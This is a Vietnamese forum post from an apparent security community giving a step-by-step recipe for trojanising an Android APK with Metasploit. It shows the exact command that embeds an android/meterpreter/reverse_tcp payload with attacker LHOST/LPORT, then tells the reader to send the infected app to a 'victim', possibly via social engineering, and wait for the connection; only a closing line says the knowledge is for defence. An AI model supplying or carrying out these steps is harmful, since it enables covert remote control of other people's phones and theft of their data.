[Metasploit] Chèn backdoor vào tập tin APK

maldet

VIP Members
31/08/2016
112
103 bài viết
[Metasploit] Chèn backdoor vào tập tin APK
Để cho ngắn gọn, hacker dùng Metasploit để inject backdoor vào một tập tin APK. Sau đó sẽ cài tập tin APK bị inject backdoor vào điện thoại Android của victim (có thể cài bằng nhiều cách, kể cả Social Engineering). Khi victim chạy ứng dụng đó lên, sẽ tự động mở kết nối tới máy tính của hacker.

Các bước thực hiện:

Bước 1: Cài đặt các gói sau với Terminal
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Bước 2: Tìm một tập tin APK dự định sẽ inject backdoor
Cái này thì không thiếu, các bạn có thể tìm trên Google rất nhiều.

Bước 3: Tải apk-embed-payload.rb ruby script
Tải tại đây.

Bước 4: Inject backdoor
ruby apk-embed-payload.rb tap_tin_apk_cua_ban.apk -p android/meterpreter/reverse_tcp LHOST=IP_cua_ban LPORT=PORT_cua_ban

Bước 5: Gửi tập tin đã inject cho victim và chờ kết nối tới :D

Chi tiết quá trình thực hiện trong video dưới đây.



 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: ghl3ay3
Bên trên